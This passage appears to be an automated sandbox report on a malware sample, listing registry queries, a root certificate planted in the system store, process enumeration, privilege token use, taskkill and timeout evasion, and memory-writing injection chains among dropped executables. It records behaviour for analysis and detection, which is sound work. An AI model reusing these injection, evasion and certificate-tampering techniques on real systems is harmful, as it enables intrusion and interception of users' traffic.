Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [hex-encoded certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [hex-encoded certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\ProgramData\kplnh\nvwjc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2948 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
PID 2780 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
PID 2780 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
PID 2780 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
PID 2780 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
PID 2780 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
PID 2780 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
PID 2780 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
PID 1796 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1796 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1796 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1796 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 108 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 108 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 108 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 108 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2780 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
PID 2780 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
PID 2780 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
PID 2780 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
PID 2392 wrote to memory of 1684 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\kplnh\nvwjc.exe
PID 2392 wrote to memory of 1684 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\kplnh\nvwjc.exe
PID 2392 wrote to memory of 1684 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\kplnh\nvwjc.exe
PID 2392 wrote to memory of 1684 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\kplnh\nvwjc.exe
PID 2780 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
PID 2780 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
PID 2780 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
PID 2780 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
PID 2780 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
PID 2780 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
PID 2780 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
PID 2780 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
PID 1396 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
PID 1396 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
PID 1396 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
PID 2780 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 2780 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 2780 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 2780 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
